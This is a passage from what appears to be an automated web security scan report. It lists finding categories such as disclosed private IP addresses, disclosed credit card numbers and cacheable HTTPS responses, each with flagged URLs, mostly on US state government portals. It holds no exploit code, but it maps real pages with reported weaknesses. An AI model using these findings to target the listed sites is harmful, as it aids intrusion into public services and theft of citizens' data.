22.232. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

22.233. https://www.vermontjoblink.com/ada/global/images/1p.gif

22.234. https://www.vermontjoblink.com/ada/global/images/error.gif

22.235. https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif

22.236. https://www.vermontjoblink.com/ada/global/images/printericonA.png

22.237. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js

22.238. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js

22.239. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js

22.240. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

22.241. https://www.vermontjoblink.com/ada/leavesite.cfm

22.242. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

22.243. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

22.244. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

22.245. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

22.246. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

22.247. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

22.248. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

22.249. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

22.250. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

22.251. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

22.252. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

22.253. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

22.254. https://www.vermontjoblink.com/ada/works/FAQ.cfm

22.255. https://www.vermontjoblink.com/ada/works/Login.cfm

22.256. https://www.vermontjoblink.com/ada/works/contactus.cfm

22.257. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

22.258. https://www.vermontjoblink.com/ada/works/joboverview.cfm

22.259. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

22.260. https://www.vermontjoblink.com/ada/works/linkview.cfm

22.261. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

22.262. https://www.vermontjoblink.com/favicon.ico

22.263. http://www.vsea.org/join-your-union

23. Private IP addresses disclosed

23.1. http://digg.com/submit

23.2. http://facebook.com/sharer.php

23.3. http://home.mcafee.com/

23.4. http://home.mcafee.com/AdviceCenter/Default.aspx

23.5. http://home.mcafee.com/Default.aspx

23.6. http://home.mcafee.com/Default.aspx

23.7. http://www.ag.ny.gov/

23.8. http://www.archives.gov/shop/

23.9. http://www.archives.gov/veterans/evetrecs/index.html

23.10. http://www.archives.gov/veterans/military-service-records/

23.11. http://www.facebook.com/TeamHaslam

23.12. http://www.facebook.com/WSDOL

23.13. http://www.facebook.com/campaign/landing.php

23.14. http://www.facebook.com/note.php

23.15. http://www.facebook.com/ohiodivisionofwatercraft

23.16. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

23.17. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

23.18. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

23.19. http://www.facebook.com/photo.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.facebook.com/share.php

23.23. http://www.facebook.com/video/video.php

23.24. http://www.google.com/sdch/rU20-FBA.dct

23.25. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx

23.26. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

23.27. http://www.ncesc.com/lmi/default.asp

24. Credit card numbers disclosed

24.1. http://data.ok.gov/views/INLINE/rows.json

24.2. http://maps.google.com/maps/sf

24.3. http://www.portal.state.pa.us/portal/server.pt/document/852822/10-06-30_2010-11_gf_tr__web_version_pdf

25. Robots.txt file

25.1. http://in.gov/core/js/arss.css

25.2. http://mi.gov/

25.3. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

25.4. http://www.governor.nh.gov/

25.5. http://www.nh.gov/

25.6. http://www.vsea.org/

26. Cacheable HTTPS response

26.1. https://app.mobilestorm.com/cp/manageforms/preview.php

26.2. https://apps.tn.gov/biztax-app/login.html

26.3. https://apps.tn.gov/biztax/

26.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

26.5. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

26.6. https://bugzilla.mozilla.org/show_bug.cgi

26.7. https://dotax.ehawaii.gov/efile/css/stylesheet.css

26.8. https://dotax.ehawaii.gov/efile/user

26.9. https://dotax.ehawaii.gov/favicon.ico

26.10. https://fortress.wa.gov/dol/dolprod/dsdoffices/

26.11. https://fortress.wa.gov/dol/dolprod/vehoffices/

26.12. https://geonic.cdc.nicusa.com/geoserver/wms

26.13. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

26.14. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

26.15. https://license.ohio.gov/lookup/default.asp

26.16. https://maps-api-ssl.google.com/maps

26.17. https://mibid.bidcorp.com/Login.aspx

26.18. https://myalaska.state.ak.us/

26.19. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

26.20. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl

26.21. https://nhlicenses2.nh.gov/favicon.ico

26.22. https://nhlicenses2.nh.gov/professional/

26.23. https://onestop.michigan.gov/favicon.ico

26.24. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png

26.25. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png

26.26. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

26.27. https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet

26.28. https://seal.verisign.com/getseal

26.29. https://secure.kentucky.gov/portal/login.aspx

26.30. https://secure.missingkids.com/missingkids/servlet/CybertipServlet

26.31. https://secure.utah.gov/rex/

26.32. https://secure.utah.gov/rex/index.html

26.33. https://treas-secure.treas.state.mi.us/eservice_enu/

26.34. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

26.35. https://web.globalpay.com/taxpayer/default.asp

26.36. https://www.accesskansas.org/businesscenter/index.html

26.37. https://www.accesskansas.org/dissolutions/index.do

26.38. https://www.accesskansas.org/favicon.ico

26.39. https://www.alabamainteractive.org/abc_license/

26.40. https://www.alabamainteractive.org/abc_license/content/common/styleSheet.jsp

26.41. https://www.bbb.org/online/consumer/cks.aspx

26.42. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

26.43. https://www.compasssmartshopper.com/WebResource.axd

26.44. https://www.compasssmartshopper.com/default.aspx

26.45. https://www.compasssmartshopper.com/passwordrecovery.aspx

26.46. https://www.ehawaii.gov/efile/

26.47. https://www.ehawaii.gov/efile/js/jquery-1.2.6.min.js

26.48. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

26.49. https://www.insightexpressai.com/adServer/adServer.aspx

26.50. https://www.ncourt.com/forms/DE/navigation.aspx

26.51. https://www.tennesseeanytime.org/biztax/

26.52. https://www.tennesseeanytime.org/favicon.ico

26.53. https://www.tennesseeanytime.org/includes/alert/alert.shtml

26.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

26.55. https://www.vermontjoblink.com/ada/404/404_qry.cfm

26.56. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

26.57. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

26.58. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

26.59. https://www.vermontjoblink.com/ada/leavesite.cfm

26.60. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

26.61. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

26.62. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

26.63. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

26.64. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

26.65. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

26.66. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

26.67. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

26.68. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

26.69. https://www.vermontjoblink.com/ada/works/FAQ.cfm

26.70. https://www.vermontjoblink.com/ada/works/Login.cfm

26.71. https://www.vermontjoblink.com/ada/works/contactus.cfm

26.72. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

26.73. https://www.vermontjoblink.com/ada/works/joboverview.cfm

26.74. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

26.75. https://www.vermontjoblink.com/ada/works/linkview.cfm

26.76. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

26.77. https://www.vitalchek.com/AjaxFAQServer.aspx

26.78. https://www.vitalchek.com/AjaxOrderStepServer.aspx

26.79. https://www.vitalchek.com/order_step_js.aspx

27. Multiple content types specified

27.1. http://data.ok.gov/packages/shared-table-editor.js

27.2. http://phonebook.iowa.gov/scripts/tiny_mce/tiny_mce.js

28. HTML does not specify charset

28.1. http://admin.state.nh.us/hr/

28.2. http://admin.state.nh.us/hr/retirement_benefits.html

28.3. http://al.gov/

28.4. http://business.ohio.gov/inc/print.css

28.5. http://cityofmuscleshoals.com/Default.asp

28.6. http://data.gosquared.com/favicon.ico

28.7. http://emergency.louisiana.gov/

28.8. http://fls.doubleclick.net/activityi

28.9. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5

28.10. http://in.gov/core/index_pages/quicklinks.html

28.11. http://jqueryui.com/themeroller/

28.12. http://ky.gov/

28.13. http://la.gov/phpincludes/weathergraphic.php

28.14. http://legis.delaware.gov/Lookup/ContactInfo_Home

28.15. http://legis.delaware.gov/Lookup/Divisions_Home

28.16. http://legis.delaware.gov/Lookup/GeneralInfo_Home

28.17. http://legis.delaware.gov/Lookup/House_Home

28.18. http://legis.delaware.gov/Lookup/Meetings_Home

28.19. http://legis.delaware.gov/Lookup/OnlinePub_Home

28.20. http://legis.delaware.gov/Lookup/SenateHome

28.21. http://legis.delaware.gov/Lookup/copyright

28.22. http://legis.delaware.gov/Lookup/disclaimer

28.23. http://legis.delaware.gov/Lookup/faq

28.24. http://legis.delaware.gov/Lookup/permissions

28.25. http://legis.delaware.gov/images/spacer.gif

28.26. http://legis.state.la.us/

28.27. http://legis.state.la.us/contact.htm

28.28. http://legis.state.la.us/index.htm

28.29. http://legis.state.la.us/main.asp

28.30. https://license.ohio.gov/lookup/default.asp

28.31. http://mi.gov/iit

28.32. http://mi.gov/unemployment

28.33. https://myalaska.state.ak.us/

28.34. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

28.35. http://ok.gov/

28.36. https://onestop.michigan.gov/OneStop/a

28.37. https://onestop.michigan.gov/css/none

28.38. https://onestop.michigan.gov/images/imgBanBG.gif

28.39. https://onestop.michigan.gov/onestop-main/OneStop/a

28.40. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do

28.41. http://orangoo.com/AmiNation/AJS

28.42. http://pa.gov/

28.43. https://portal.s4web.state.mn.us/favicon.ico

28.44. http://public.leginfo.state.ny.us/menugetf.cgi

28.45. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm

28.46. http://tools.google.com/service/update2

28.47. https://treas-secure.treas.state.mi.us/eservice_enu/

28.48. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

28.49. http://view.atdmt.com/iaction/kgakog_General_1/v3/ato./[atc1.1215451620/atc2.false/atc3.landing%20page:visit%20florida]

28.50. https://web.globalpay.com/taxpayer/default.asp

28.51. http://www.alabama.gov/portal/common/feedback.jsp

28.52. http://www.alabama.gov/sliverheader/Welcome.do

28.53. https://www.alabamainteractive.org/abc_license/

28.54. https://www.alabamainteractive.org/arecmenu/welcome.action

28.55. http://www.ct.gov/ctportal/assets/templates/62/css/print.css

28.56. http://www.ct.gov/ctportal/cwp/a

28.57. http://www.ct.gov/favicon.ico

28.58. http://www.dot.state.tx.us/txdoteforms/GetForm

28.59. http://www.dyve.net/jquery/

28.60. http://www.georgia.gov/favicon.ico

28.61. http://www.hoosierdata.in.gov/nav.asp

28.62. http://www.in.gov/sliverheader/Welcome.do

28.63. http://www.labor.vermont.gov/sections/wfd/training/wiatrain/index.cfm

28.64. http://www.legis.louisiana.gov/boards/board_members.asp

28.65. http://www.legis.state.la.us/billdata/bytype.asp

28.66. http://www.legis.state.la.us/puls_main.htm

28.67. http://www.missingkids.com/cybertip/

28.68. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

28.69. http://www.nccourts.org/Forms/FormSearchResults.asp

28.70. http://www.nccourts.org/Support/FAQs/FAQs.asp

28.71. http://www.nhfishandgame.com/

28.72. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

28.73. http://www.nhfishandgame.com/nh/

28.74. https://www.paybill.com/payccu/

28.75. http://www.sled.state.sc.us/sled/default.asp

28.76. http://www.state.nj.us/cgi-bin/corrections/njnewsline/view_article.pl

28.77. http://www.sus.edu/CatSubCat/CatSubCat.asp

28.78. http://www.txdot.gov/txdoteforms/GetForm

28.79. https://www.vitalchek.com/order_step_js.aspx

28.80. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

29. HTML uses unrecognised charset

30. Content type incorrectly stated

30.1. http://api.flickr.com/services/rest/

30.2. https://app.mobilestorm.com/cp/manageforms/preview.php

30.3. http://data.gosquared.com/info

30.4. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur

30.5. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur

30.6. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur

30.7. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur

30.8. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur

30.9. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur

30.10. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur

30.11. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur

30.12. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur

30.13. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur

30.14. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur

30.15. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur

30.16. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur

30.17. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur

30.18. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur

30.19. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur

30.20. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur

30.21. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur

30.22. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur

30.23. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur

30.24. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur

30.25. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur

30.26. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur

30.27. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur

30.28. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur

30.29. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur

30.30. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur

30.31. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur

30.32. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur

30.33. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur

30.34. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur

30.35. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur

30.36. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur

30.37. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur

30.38. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur

30.39. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur

30.40. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur

30.41. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur

30.42. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur

30.43. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur

30.44. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur

30.45. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur

30.46. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur

30.47. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur

30.48. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur

30.49. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur

30.50. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur

30.51. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur

30.52. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur

30.53. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur

30.54. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur

30.55. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur

30.56. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur

30.57. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur

30.58. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur

30.59. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur

30.60. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur

30.61. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur

30.62. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur

30.63. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur

30.64. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur

30.65. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur

30.66. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur

30.67. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur

30.68. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur

30.69. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur

30.70. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur

30.71. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur

30.72. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur

30.73. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur

30.74. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur

30.75. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur

30.76. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur

30.77. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur

30.78. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur

30.79. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur

30.80. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur

30.81. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur

30.82. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur

30.83. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur

30.84. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur

30.85. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur

30.86. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur

30.87. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur

30.88. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur

30.89. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur

30.90. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur

30.91. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur

30.92. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur

30.93. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur

30.94. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur

30.95. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur

30.96. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur

30.97. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur

30.98. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur

30.99. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur

30.100. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur

30.101. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur

30.102. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur

30.103. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur

30.104. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur

30.105. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur

30.106. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur

30.107. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur

30.108. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur

30.109. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur

30.110. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur

30.111. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur

30.112. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur

30.113. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur

30.114. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur

30.115. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur

30.116. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur

30.117. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur

30.118. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur

30.119. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur

30.120. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur

30.121. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur

30.122. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur

30.123. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur

30.124. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur

30.125. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur

30.126. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur

30.127. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur

30.128. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur

30.129. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur

30.130. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur

30.131. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur

30.132. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur

30.133. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur

30.134. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur

30.135. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur

30.136. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur

30.137. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur

30.138. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur

30.139. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur

30.140. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur

30.141. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur

30.142. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur

30.143. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur

30.144. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur

30.145. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur

30.146. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur

30.147. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur

30.148. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur

30.149. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur

30.150. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur

30.151. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur

30.152. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur

30.153. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur

30.154. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur

30.155. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur

30.156. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur

30.157. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur

30.158. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur

30.159. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur

30.160. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur

30.161. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur

30.162. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur

30.163. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur

30.164. http://data.ok.gov/views.json

30.165. http://data.osbm.state.nc.us/pls/linc/dyn_linc_main.show

30.166. http://de.gov/images/favicon.ico

30.167. http://doa.alaska.gov/dmv/scripts/style.css

30.168. https://dotax.ehawaii.gov/efile/css/stylesheet.css

30.169. https://dotax.ehawaii.gov/favicon.ico

30.170. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

30.171. http://feeds.feedburner.com/~s/kansasgovwhatsnew

30.172. http://ga.gov/gta/images/webpage/link_icon.gif

30.173. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.aspx

30.174. http://johncarney.house.gov/profiles/house/themes/house/images/favicon.ico

30.175. http://kdkgllry.netmng.com/

